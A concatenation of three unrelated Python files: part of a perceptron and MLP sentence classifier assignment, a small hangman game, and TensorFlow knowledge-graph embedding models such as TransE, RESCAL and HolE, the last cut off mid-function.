# prediction = [1 if i > 0 else 0 for i in output]
prediction = np.sign(output)
if prediction == -1:
prediction = 0
prediction_list.append(prediction)
return prediction_list
def calculate_accuracy(self, validation_x, validation_y):
predictions = self.inference(validation_x)
accuracy = 0
for pred, gold in zip(predictions, validation_y):
if pred == gold:
accuracy = accuracy + 1
accuracy = accuracy / len(validation_x)
return accuracy
def train(self, X, Y, validation_x, validation_y, learning_rate, num_epochs=50):
# calculate the output (w * x)
#output = x_data.dot(self.weights) + self.bias
# make a prediction (1 if output > 0, else -1)
# calculate the error
# update the weights based on the learning rate and error
# keep track of best accuracy to avoid overfitting
best_accuracy = 0
previous_best_accuracy = 0
third_prev_best_accuracy = 0
for j in range(num_epochs):
for i in range(0, len(X)):
# if y' != y
multiple = 0
if Y[i] == 0:
multiple = -1
else:
multiple = 1
if (np.dot(X[i], self.weights)*multiple) <= 0:
self.weights = self.weights + learning_rate*multiple*X[i]
# use the validation set to control overfitting.
# stop training if we start to overfit the train set.
current_accuracy = self.calculate_accuracy(validation_x, validation_y)
if best_accuracy == previous_best_accuracy == third_prev_best_accuracy == current_accuracy:
print("Best accuracy: " + str(best_accuracy) + " current accuracy: " + str(current_accuracy))
print("Stopped training at epoch: " + str(j))
break
else:
third_prev_best_accuracy = previous_best_accuracy
previous_best_accuracy = best_accuracy
best_accuracy = current_accuracy
def feature_extractor_test_data(data, labels, all_words):
data_array = np.zeros((len(data), len(all_words)))
all_words = list(all_words)
for index, row in enumerate(data):
tokens = [word.lower() for word in row.split()]
#words_no_stopwords = [word for word in tokens if not word in stopwordsSet]
for i, word in enumerate(tokens):
try:
word_index = all_words.index(word)
data_array[index, word_index] = 1
except:
continue
x_data_array = np.asarray(data_array)
return x_data_array, np.array(labels)
#return bigram_data_array, np.array(labels)
def feature_extractor_training_data(data, labels):
"""
implement your feature extractor here
"""
# stopwords from NLTK
stopwordsSet = set(stopwords.words("english"))
# unique words set without stopwords
unique_words = set()
all_words = []
for row in data:
words = row.split()
for i in words:
if i.lower() not in unique_words and i.lower() not in stopwordsSet:
unique_words.add(i.lower())
all_words.append(i.lower())
data_array = np.zeros((len(data), len(all_words)))
for index, row in enumerate(data):
tokens = [word.lower() for word in row.split()]
#words_no_stopwords = [word for word in tokens if not word in stopwordsSet]
for i, word in enumerate(tokens):
try:
word_index = all_words.index(word)
data_array[index, word_index] = 1
except:
continue
# the bag of words representation
x_data_array = np.asarray(data_array)
return x_data_array, np.array(labels), all_words
def evaluate(preds, golds):
tp, pp, cp = 0.0, 0.0, 0.0
# zip -> iterator that aggreagates elements from each of the iterables
for pred, gold in zip(preds, golds):
if pred == 1:
pp += 1
if gold == 1:
cp += 1
if pred == 1 and gold == 1:
tp += 1
precision = tp / pp
recall = tp / cp
try:
f1 = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
return (precision, recall, 0.0)
return (precision, recall, f1)
def main():
start_time = timeit.default_timer()
argparser = argparse.ArgumentParser()
argparser.add_argument("--best_parameters")
args, leftovers = argparser.parse_known_args()
with open("sentences.txt", encoding='latin-1') as f:
data = f.readlines()
with open("labels.txt", encoding='latin-1') as g:
labels = [int(label) for label in g.read()[:-1].split("\n")]
"""
Cross Validation - Separate data into 60%, 20%, 20% (training, validation, test)
Validation - If accuracy of training data set increases but validation doesn't, then stop training
"""
# return a list of numbers in a random order
data_length = len(data)
indices = np.random.permutation(data_length)
training_index, validation_index, test_index = indices[:int(.6 * data_length)], indices[int(.6 * data_length):int(.8 * data_length)], indices[int(.8 * data_length):]
data = np.asarray(data)
labels = np.asarray(labels)
training_x_data = data[training_index]
training_y_data = labels[training_index]
validation_x_data = data[validation_index]
validation_y_data = labels[validation_index]
test_x_data = data[test_index]
test_y_data = labels[test_index]
"""
Extract features
"""
if args.best_parameters is None:
training_x_data, training_y_data, unique_words = feature_extractor_training_data(training_x_data, training_y_data)
np.save("unique_words.npy", unique_words)
else:
unique_words = np.load("unique_words.npy")
training_x_data, training_y_data = feature_extractor_test_data(training_x_data, training_y_data, unique_words)
validation_x_data, validation_y_data = feature_extractor_test_data(validation_x_data, validation_y_data, unique_words)
test_x_data, test_y_data = feature_extractor_test_data(test_x_data, test_y_data, unique_words)
"""
Initialize the algorithms
"""
data_sample_length = len(training_x_data[0])
myperceptron = Perceptron(data_sample_length)
hidden_layer_size = [12]
output_size = 1
mymlp = MLP(data_sample_length, hidden_layer_size, output_size)
"""
Training
"""
learning_rate = 0.001
#learning_rate_finish = 0.0003
#learning_rate_decay = (learning_rate_finish / learning_rate) ** (1./num_epochs)
learning_rate_decay = 1
num_epochs = 160
if args.best_parameters is None:
mymlp.train(training_x_data, training_y_data, validation_x_data, validation_y_data, learning_rate, learning_rate_decay, num_epochs=num_epochs)
else:
with gzip.open(args.best_parameters, 'rb') as f:
best_parameters_dictionary = pickle.load(f)
mymlp.set_parameters(best_parameters_dictionary)
myperceptron.train(training_x_data, training_y_data, validation_x_data, validation_y_data, 1.0)
"""
Testing on testing data set
"""
#with open("sentences.txt", encoding='latin-1') as f:
# test_x = f.readlines()
#with open("labels.txt", encoding='latin-1') as g:
# test_y = np.asarray([int(label) for label in g.read()[:-1].split("\n")])
predicted_y = mymlp.inference(test_x_data)
precision, recall, f1 = evaluate(predicted_y, test_y_data)
#print "MLP results", precision, recall, f1
accuracy = mymlp.calculate_accuracy(test_x_data, test_y_data)
print("MLP Accuracy: " + str(accuracy))
print("MLP results: " + str(precision) + " " + str(recall) + " " + str(f1))
#test_x, test_y = feature_extractor(data, labels)
predicted_y = myperceptron.inference(test_x_data)
precision, recall, f1 = evaluate(predicted_y, test_y_data)
accuracy = myperceptron.calculate_accuracy(test_x_data, test_y_data)
print("Perceptron Accuracy: " + str(accuracy))
#print "Perceptron results", precision, recall, f1
print("Perceptron results" + " " + str(precision) + " " + str(recall) + " " + str(f1))
elapsed = timeit.default_timer() - start_time
print(elapsed)
"""
Testing on unseen testing data in grading
"""
argparser.add_argument("--test_data", type=str, default="../test_sentences.txt", help="The real testing data in grading")
argparser.add_argument("--test_labels", type=str, default="../test_labels.txt", help="The labels for the real testing data in grading")
parsed_args = argparser.parse_args(sys.argv[1:])
real_test_sentences = parsed_args.test_data
real_test_labels = parsed_args.test_labels
with open(real_test_sentences, encoding='latin-1') as f:
real_test_x = f.readlines()
with open(real_test_labels, encoding='latin-1') as g:
real_test_y = [int(label) for label in g.read()[:-1].split("\n")]
#real_test_y = g.readlines()
real_test_x, real_test_y = feature_extractor_test_data(real_test_x, real_test_y, unique_words)
print(real_test_x.shape)
print(real_test_y.shape)
predicted_y = mymlp.inference(real_test_x)
precision, recall, f1 = evaluate(predicted_y, real_test_y)
print("MLP results: " + str(precision) + " " + str(recall) + " " + str(f1))
#print "MLP results", precision, recall, f1
predicted_y = myperceptron.inference(real_test_x)
precision, recall, f1 = evaluate(predicted_y, real_test_y)
print("Perceptron results" + " " + str(precision) + " " + str(recall) + " " + str(f1))
#print "Perceptron results", precision, recall, f1
if __name__ == '__main__':
main()
|
word = ["python", "java", "kotlin", "javascript"].pop()
display = ["-"] * len(word)
guesses = set()
lives = 8
print("H A N G M A N")
while True:
instruction = input('Type "play" to play the game, "exit" to quit: ')
if instruction == "play":
while lives > 0:
print()
print("".join(display))
letter = input("Input a letter: ")
if len(letter) == 1:
if letter.isascii() and letter.islower():
if letter not in guesses:
guesses.add(letter)
if letter in word:
for i in range(len(word)):
if word[i] == letter:
display[i] = letter
if "-" not in display:
print("You guessed the word!")
print("You survived!")
break
else:
lives -= 1
print("That letter doesn't appear in the word")
if lives == 0:
print("You lost!")
else:
print("You've already guessed this letter")
else:
print("Please enter a lowercase English letter")
else:
print("You should input a single letter")
print()
# The following two lines are only included to pass the test case.
print('Type "play" to play the game, "exit" to quit: ')
break
elif instruction == "exit":
break
|
import collections
import time
import sklearn.feature_extraction
import sklearn.preprocessing
import numpy as np
from scipy import sparse
import tensorflow as tf
def init_nunif(sz, bnd=None):
if bnd is None:
if len(sz) >= 2:
bnd = np.sqrt(6) / np.sqrt(sz[0] + sz[1])
else:
bnd = 1.0 / np.sqrt(sz[0])
return np.random.uniform(low=-bnd, high=bnd, size=sz)
def tf_cconv(a, b):
a_fft = tf.fft(tf.complex(a, 0.0))
b_fft = tf.fft(tf.complex(b, 0.0))
ifft = tf.ifft(a_fft * b_fft)
return tf.cast(tf.real(ifft), 'float32')
def np_cconv(a, b):
a_fft = np.fft.fft(a)
b_fft = np.fft.fft(b)
return np.fft.ifft(a_fft * b_fft).real
def tf_ccorr(a, b):
a_fft = tf.fft(tf.complex(a, 0.0))
b_fft = tf.fft(tf.complex(b, 0.0))
ifft = tf.ifft(tf.conj(a_fft) * b_fft)
return tf.cast(tf.real(ifft), 'float32')
def np_ccorr(a, b):
a_fft = np.fft.fft(a)
b_fft = np.fft.fft(b)
return np.fft.ifft(np.conj(a_fft) * b_fft).real
def vec_mat_mul(v, M):
product = tf.matmul(tf.expand_dims(v,-2), M)
return tf.squeeze(product, -2)
class BaseModel(object):
def __init__(self, ne, nr, dim, samplef, **kwargs):
self.samplef = samplef
self.ne = ne
self.nr = nr
self.dim = dim
self.pairwise = kwargs.pop("pairwise", True)
self.epochs = kwargs.pop("epochs",200)
self.batch_size = kwargs.pop("batch_size",1024)
self.learning_rate = kwargs.pop("learning_rate",0.01)
self.reg = kwargs.pop("reg",0.0)
self.margin = kwargs.pop("margin",1.0)
self.param_names = [] # list of parameters names needed for computing the score of a triplet
self.E_shape = [self.ne, self.dim]
self.R_shape = [self.nr, self.dim]
self.reg_loss = tf.constant(0, dtype=tf.float32)
def _on_epoch_begin(self):
self.indices = np.arange(len(self.X))
np.random.shuffle(self.indices)
def _get_batch(self, idx):
indices = self.indices[idx*self.batch_size : (idx+1)*self.batch_size]
pos = self.X[indices]
neg = np.array([self.samplef(fact, self.ne) for fact in pos])
subjs = pos[:,0]
objs = pos[:,2]
preds = pos[:,1]
neg_subjs = neg[:,0]
neg_objs = neg[:,2]
return {self.ps:subjs, self.po:objs, self.ns:neg_subjs, self.no:neg_objs, self.p:preds}
def _add_param(self, name, shape, bnd=None):
init_vals = init_nunif(shape, bnd)
var = tf.Variable(init_vals, dtype=tf.float32, name=name)
setattr(self, name, var)
self.param_names.append(name)
x = tf.nn.l2_loss(var)
self._regularize(var)
def create_params(self):
self._add_param("E", self.E_shape)
self._add_param("R", self.R_shape)
def gather(self, s, p, o):
E_s = tf.gather(self.E, s)
R = tf.gather(self.R, p)
E_o = tf.gather(self.E, o)
return E_s, R, E_o
def gather_np(self, si, pi, oi):
es = self.E[si]
eo = self.E[oi]
r = self.R[pi]
return es, r, eo
def train_score(self, s, p, o):
raise NotImplementedError("train_score should be defined by the inheriting class")
def _regularize(self, var):
if self.reg > 0:
self.reg_loss += tf.nn.l2_loss(var)
def train_loss(self, score_pos, score_neg):
if self.pairwise:
rank_loss = tf.reduce_sum(tf.maximum(0.0, self.margin - score_pos + score_neg))
else:
# Logistic loss
rank_loss = tf.reduce_sum(tf.nn.softplus(-score_pos) + tf.nn.softplus(score_neg))
return rank_loss + self.reg * self.reg_loss
def fit(self, X, y=None):
'''
X : list/iterable of (subject, object, predicate) triplets
y : ignored (assumes all examples are positive)
'''
self.X = np.array(X)
self.ps = tf.placeholder(tf.int32, [self.batch_size])
self.p = tf.placeholder(tf.int32, [self.batch_size])
self.po = tf.placeholder(tf.int32, [self.batch_size])
self.ns = tf.placeholder(tf.int32, [self.batch_size])
self.no = tf.placeholder(tf.int32, [self.batch_size])
self.create_params()
score_pos = self.train_score(self.ps, self.p, self.po)
score_neg = self.train_score(self.ns, self.p, self.no)
self.loss = self.train_loss(score_pos, score_neg)
self._optimize()
def _run_epoch(self, optimizer):
start = time.time()
self._on_epoch_begin()
tot_loss = 0
self.cur_epoch += 1
for b in range(len(self.X)//self.batch_size):
feed_dict = self._get_batch(b)
_,l = self.sess.run([optimizer,self.loss], feed_dict=feed_dict)
tot_loss += l
avg_loss = tot_loss / (len(self.X)//self.batch_size * self.batch_size)
t = time.time() - start
print("Epoch: %i/%i; loss = %.9f (%.1f s)" %(self.cur_epoch+1,self.epochs,avg_loss,t), end="\r")
if (self.cur_epoch+1)%10 == 0:
print("")
def _optimize(self):
opt1 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss)
self.sess = tf.Session()
init = tf.global_variables_initializer()
self.sess.run(init)
self.cur_epoch = 0
print("Starting training")
for epoch in range(self.epochs):
self._run_epoch(opt1)
print("")
tf_objects = [getattr(self, attr) for attr in self.param_names]
vals = self.sess.run(tf_objects)
for attr,val in zip(self.param_names,vals):
setattr(self, attr, val)
class TransE(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
def train_score(self, s, p, o):
E_s, R, E_o = self.gather(s, p, o)
return -tf.reduce_sum(tf.abs(E_s + R - E_o), axis=-1)
def score(self, si, pi, oi):
es, r, eo = TransE.gather_np(self, si, pi, oi)
return -np.sum(np.abs(es + r - eo), axis=-1)
class TransR(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
def create_params(self):
BaseModel.create_params(self)
self._add_param("Mr", [self.nr, self.dim, self.dim])
def gather(self, s, p, o):
E_s = tf.gather(self.E, s)
R = tf.gather(self.R, p)
Mr = tf.gather(self.Mr, p)
E_o = tf.gather(self.E, o)
return E_s, R, Mr, E_o
def gather_np(self, si, pi, oi):
es, r, eo = BaseModel.gather_np(self, si, pi, oi)
Mr = self.Mr[pi]
return es, r, Mr, eo
def train_score(self, s, p, o):
E_s, R, Mr, E_o = self.gather(s, p, o)
# Mr : [batch_size x dim x dim]
# E_s, E_o : [batch_size x dim]
E_sr = vec_mat_mul(E_s, Mr)
E_or = vec_mat_mul(E_o, Mr)
return -tf.reduce_sum(tf.abs(E_sr + R - E_or), axis=-1)
def score(self, si, pi, oi):
es, r, Mr, eo = TransR.gather_np(self, si, pi, oi)
esp = np.matmul(es, Mr)
eop = np.matmul(eo, Mr)
return -np.sum(np.abs(esp + r - eop), axis=-1)
class RESCAL(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
self.learning_rate = kwargs.pop("learning_rate",0.1)
def train_score(self, s, p, o):
E_s, R, E_o = self.gather(s, p, o)
return tf.reduce_sum(vec_mat_mul(E_s, R) * E_o, axis=-1)
def score(self, si, pi, oi):
es, r, eo = RESCAL.gather_np(self, si, pi, oi)
return np.sum(np.matmul(es, r) * eo, axis=-1)
class HolE(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.learning_rate = kwargs.pop("learning_rate",0.1)
def train_score(self, s, p, o):
E_s, R, E_o = self.gather(s, p, o)
return tf.reduce_sum(R * tf_ccorr(E_s, E_o), axis=-1)
def score(self, si, pi, oi):
es, r, eo = HolE.gather_np(self, si, pi, oi)
return np.sum(r * np_ccorr(es, eo), axis=-1)
class SE(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
def create_params(self):
BaseModel.create_params(self)
self.param_names.remove("R")
self._add_param("R1", self.R_shape)
self._add_param("R2", self.R_shape)
def gather(self, s, p, o):
E_s = tf.gather(self.E, s)
R1 = tf.gather(self.R1, p)
R2 = tf.gather(self.R2, p)
E_o = tf.gather(self.E, o)
return E_s, E_o, R1, R2
def gather_np(self, si, pi, oi):
es, r, eo = BaseModel.gather_np(self, si, pi, oi)
R1 = self.R1[pi]
R2 = self.R2[pi]
return es, eo, R1, R2
def train_score(self, s, p, o):
E_s, E_o, R1, R2 = self.gather(s, p, o)
# E_s, E_o : [batch_size x dim]
# R1, R2 : [batch_size x dim x dim]
E_sr = vec_mat_mul(E_s, R1)
E_or = vec_mat_mul(E_o, R2)
return -tf.reduce_sum(tf.abs(E_sr - E_or), axis=-1)
def score(self, si, pi, oi):
es, eo, R1, R2 = SE.gather_np(self, si, pi, oi)
esr = np.matmul(es, R1)
eor = np.matmul(eo, R2)
return -np.sum(np.abs(esr - eor), axis=-1)
class DistMult(BaseModel):
def __init__(self, ne, nr, dim, samplef, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.learning_rate = kwargs.pop("learning_rate",0.1)
def train_score(self, s, p, o):
E_s, R, E_o = self.gather(s, p, o)
return tf.reduce_sum(E_s * R * E_o, axis=-1)
def score(self, si, pi, oi):
es, r, eo = DistMult.gather_np(self, si, pi, oi)
return np.sum(es * r * eo, axis=-1)
class BaseWordVectorsModel(BaseModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True, pe=False,
tfidf_weights=False, **kwargs):
'''
word_ids: length ne list/iterable, where word_ids[i] is a list/iterable of indices
of words associated with entity i
word_init: length nw list/iterable, where word_init[i] is a numpy array indicating the
initial value to assign to the vector for word i, or None if no intial
value is avaiable.
'''
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.word_ids = word_ids
assert len(self.word_ids) == ne
self.nw = max(max(ids) for ids in self.word_ids if len(ids) > 0) + 1
self.word_init = word_init
if self.word_init is not None:
# Make sure embedding dimensionality is the same as that of the word initialization vectors
text_dim = next(len(x) for x in self.word_init if x is not None)
if text_dim != self.dim:
print("WARNING: Detected dimension %i word initialization vectors. Overriding dimension setting of %i."
%(text_dim, self.dim))
self.dim = text_dim
self.R_shape = [self.nr, self.dim]
self.weighted = weighted
self.pe = pe
self.tfidf_weights = tfidf_weights
self.learning_rate = kwargs.pop("learning_rate",0.1)
def create_params(self):
# Since tensorflow does not support gathering of sparse matrices (needed for gathering a batch),
# we use the following workaround.
# Store the sparse matrix as a list of sparse vectors (note the matrix is constant).
# Leave the sparse matrix A as a sparse placeholder.
# Then to compute the entity embeddings of a batch, gather only the indices and values of A for that
# batch and feed it into the placeholder for A. Then compute E as usual.
# Build word matrix as in BaseModel
nw = self.nw
assert all(max(ids) < self.nw for ids in self.word_ids if len(ids) > 0)
# Assign unique dummy ids to entities with no words
for i in range(self.ne):
if len(self.word_ids[i]) == 0:
self.word_ids[i] = [self.nw]
self.nw += 1
self.nw += sum([len(words) == 0 for words in self.word_ids])
W_init = init_nunif([self.nw, self.dim])
if self.word_init is not None:
for i in range(nw):
if self.word_init[i] is not None:
W_init[i] = self.word_init[i]
self.W = tf.Variable(W_init, dtype=tf.float32, name="W")
self.param_names.append("W")
self._regularize(self.W)
if self.pe:
# Parameter-efficient weighting scheme
self.P = tf.Variable(np.random.uniform(low=-0.1, high=0.1, size=[self.nr,self.dim]), dtype=tf.float32, name="P")
weights = tf.matmul(self.P, tf.transpose(self.W))
self.B = tf.exp(weights)
self.param_names.append("P")
self.phase2_vars = [self.P]
else:
# Setting B constant (untrainable) and uniform is equivalent to unweighted word vectors.
self.B = tf.Variable(np.ones([self.nr,self.nw]), dtype=tf.float32, trainable=self.weighted, name="B")
self.phase2_vars = [self.B]
self.param_names.append("B")
if self.tfidf_weights:
# Extract tf-idf weights
corpus = [" ".join(list(map(str,ids))) for ids in self.word_ids]
vocab = map(str, range(self.nw))
vectorizer = sklearn.feature_extraction.text.TfidfVectorizer(vocabulary=vocab)
self.A = vectorizer.fit_transform(corpus)
self.A = sklearn.preprocessing.normalize(self.A, norm="l1", axis=1)
else:
# Weights are just frequencies of words
# Create sparse matrix as a list of lists of indices and values
values = []
row_ind = []
col_ind = []
no_word_id = nw
for i in range(self.ne):
vals = collections.defaultdict(float)
for j in self.word_ids[i]:
vals[j] += 1.0
for j in vals.keys():
row_ind.append(i)
col_ind.append(j)
values.append(vals[j])
self.A = sparse.csr_matrix((values, (row_ind, col_ind)), shape=[self.ne,self.nw], dtype=np.float32)
self.A = sklearn.preprocessing.normalize(self.A, norm="l1", axis=1)
self._add_param("R", self.R_shape)
def _gather_A(self, idx):
A_batch = sparse.coo_matrix(self.A[idx], dtype=np.float32)
ret = tf.SparseTensorValue(indices=np.array([A_batch.row,A_batch.col]).T, values=A_batch.data,
dense_shape=[self.batch_size,self.nw])
return ret
def _get_batch(self, idx):
# Add sparse tensor values for A matrices to feed dict
feed_dict = BaseModel._get_batch(self, idx)
feed_dict[self.A_ps] = self._gather_A(feed_dict[self.ps])
feed_dict[self.A_po] = self._gather_A(feed_dict[self.po])
feed_dict[self.A_ns] = self._gather_A(feed_dict[self.ns])
feed_dict[self.A_no] = self._gather_A(feed_dict[self.no])
return feed_dict
def gather(self, s, p, o):
B = tf.gather(self.B, p)
s_weights = self.A_s * B
s_weights /= tf.sparse_reduce_sum(s_weights, axis=1, keep_dims=True)
o_weights = self.A_o * B
o_weights /= tf.sparse_reduce_sum(o_weights, axis=1, keep_dims=True)
E_s = tf.sparse_tensor_dense_matmul(s_weights, self.W)
E_o = tf.sparse_tensor_dense_matmul(o_weights, self.W)
R = tf.gather(self.R, p)
return E_s, R, E_o
def gather_np(self, si, pi, oi):
B = self.B[pi]
A_s = self.A[si]
A_o = self.A[oi]
s_weights = A_s.multiply(B)
s_weights /= s_weights.sum(axis=-1)
o_weights = A_o.multiply(B)
o_weights /= o_weights.sum(axis=-1)
es = np.array(sparse.csr_matrix.dot(s_weights, self.W))
eo = np.array(sparse.csr_matrix.dot(o_weights, self.W))
r = self.R[pi]
return es, r, eo
def fit(self, X, y=None):
'''
X : list/iterable of (subject, object, predicate) triplets
y : ignored (assumes all examples are positive)
'''
self.X = np.array(X)
self.ps = tf.placeholder(tf.int32, [self.batch_size])
self.p = tf.placeholder(tf.int32, [self.batch_size])
self.po = tf.placeholder(tf.int32, [self.batch_size])
self.ns = tf.placeholder(tf.int32, [self.batch_size])
self.no = tf.placeholder(tf.int32, [self.batch_size])
self.create_params()
# Note: this must be done after create_params because create_params changes nw
self.A_ps = tf.sparse_placeholder(dtype=tf.float32)
self.A_po = tf.sparse_placeholder(dtype=tf.float32)
self.A_ns = tf.sparse_placeholder(dtype=tf.float32)
self.A_no = tf.sparse_placeholder(dtype=tf.float32)
# Workaround so we don't have to rewrite all the train_score functions. Instead
# of passing in A_ps and A_po, store it in self before calling the function.
self.A_s, self.A_o = self.A_ps, self.A_po
score_pos = self.train_score(self.ps, self.p, self.po)
self.A_s, self.A_o = self.A_ns, self.A_no
score_neg = self.train_score(self.ns, self.p, self.no)
self.loss = self.train_loss(score_pos, score_neg)
self._optimize()
def _optimize(self):
if not self.weighted:
BaseModel._optimize(self)
else:
phase1_vars = tf.trainable_variables()
for var in self.phase2_vars:
phase1_vars.remove(var)
opt1 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss, var_list=phase1_vars)
opt2 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss)
self.sess = tf.Session()
init = tf.global_variables_initializer()
self.sess.run(init)
self.cur_epoch = 0
print("Optimizing - phase 1")
for epoch in range(self.epochs//4):
self._run_epoch(opt1)
print("")
print("Optimizing - phase 2")
for epoch in range(3*self.epochs//4):
self._run_epoch(opt2)
print("")
tf_objects = [getattr(self, attr) for attr in self.param_names]
vals = self.sess.run(tf_objects)
for attr,val in zip(self.param_names,vals):
setattr(self, attr, val)
self.param_names.append("A")
class TransEWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def train_score(self, s, p, o):
return TransE.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = TransEWordVectors.gather_np(self, si, pi, oi)
return -np.sum(np.abs(es + r - eo), axis=-1, keepdims=False)
class TransRWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def create_params(self):
BaseWordVectorsModel.create_params(self)
self._add_param("Mr", [self.nr, self.dim, self.dim])
def gather(self, s, p, o):
E_s, R, E_o = BaseWordVectorsModel.gather(self, s, p, o)
Mr = tf.gather(self.Mr, p)
return E_s, R, Mr, E_o
def gather_np(self, si, pi, oi):
es, r, eo = BaseWordVectorsModel.gather_np(self, si, pi, oi)
Mr = self.Mr[pi]
return es, r, Mr, eo
def train_score(self, s, p, o):
return TransR.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, Mr, eo = TransRWordVectors.gather_np(self, si, pi, oi)
esp = np.matmul(es, Mr)
eop = np.matmul(eo, Mr)
return -np.sum(np.abs(esp + r - eop), axis=-1)
class RESCALWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
def train_score(self, s, p, o):
return RESCAL.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = RESCALWordVectors.gather_np(self, si, pi, oi)
return np.sum(np.matmul(es, r) * eo, axis=-1)
class HolEWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def train_score(self, s, p, o):
return HolE.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = HolEWordVectors.gather_np(self, si, pi, oi)
return np.sum(r * np_ccorr(es, eo), axis=-1)
class SEWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
def create_params(self):
BaseWordVectorsModel.create_params(self)
self._add_param("R1", self.R_shape)
self._add_param("R2", self.R_shape)
def gather(self, s, p, o):
E_s, R, E_o = BaseWordVectorsModel.gather(self, s, p, o)
R1 = tf.gather(self.R1, p)
R2 = tf.gather(self.R2, p)
return E_s, E_o, R1, R2
def gather_np(self, si, pi, oi):
es, r, eo = BaseWordVectorsModel.gather_np(self, si, pi, oi)
R1 = self.R1[pi]
R2 = self.R2[pi]
return es, eo, R1, R2
def train_score(self, s, p, o):
return SE.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, eo, R1, R2 = SEWordVectors.gather_np(self, si, pi, oi)
esr = np.matmul(es, R1)
eor = np.matmul(eo, R2)
return -np.sum(np.abs(esr - eor), axis=-1)
class DistMultWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def train_score(self, s, p, o):
return DistMult.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = DistMultWordVectors.gather_np(self, si, pi, oi)
return np.sum(es * r * eo, axis=-1)
class BaseFeatureSumModel(BaseModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.orig_samplef = samplef
self.train_words = kwargs.pop("train_words",True)
self.reg = 0.0
self.W_text = W_text
self.text_dim = next(len(x) for x in W_text if x is not None)
self.R_shape = [self.nr, self.text_dim + self.dim]
def _permute_indices(self, X):
'''
Permute entity indices such that all entities with unknown text embeddings (W_text[i] is None)
occur at the end.
'''
# idx_map : old index to new index
# inv_idx_map : new index to old index
self.idx_map = [0] * self.ne
self.inv_idx_map = [0] * self.ne
self.num_unknown = sum(1 for x in self.W_text if x is None)
num_known = sum(1 for x in self.W_text if x is not None)
cnt_known = 0
cnt_unknown = 0
for i in range(self.ne):
if self.W_text[i] is None:
self.idx_map[i] = num_known + cnt_unknown
cnt_unknown += 1
else:
self.idx_map[i] = cnt_known
cnt_known += 1
self.inv_idx_map[self.idx_map[i]] = i
assert list(sorted(self.idx_map)) == list(range(self.ne))
assert list(sorted(self.inv_idx_map)) == list(range(self.ne))
# Update indices in training data x
for i in range(len(X)):
X[i] = list(X[i])
X[i][0] = self.idx_map[X[i][0]]
X[i][2] = self.idx_map[X[i][2]]
self.W_text = np.array([x for x in self.W_text if x is not None])
# IMPORTANT: Update negative sampling function to undo the permutation because
# it references the internal KnowledgeGraph representation which is not permuted.
# Then redo the permutation on the result.
def new_samplef(x, ne):
res = self.orig_samplef((self.inv_idx_map[x[0]], x[1], self.inv_idx_map[x[2]]), ne)
return (self.idx_map[res[0]], res[1], self.idx_map[res[2]])
self.samplef = new_samplef
assert len(self.W_text) + self.num_unknown == self.ne
return np.array(X)
def _unpermute_indices(self):
'''
Undo the index permutation by rearranging the rows of self.E and self.W.
'''
for attr in ["E","W"]:
arr = getattr(self,attr)
new_arr = []
for i in range(self.ne):
# i is old index, idx_map[i] is new index
new_arr.append(arr[self.idx_map[i]])
setattr(self, attr, np.array(new_arr))
def create_params(self):
# compute average L1 norm of text vector
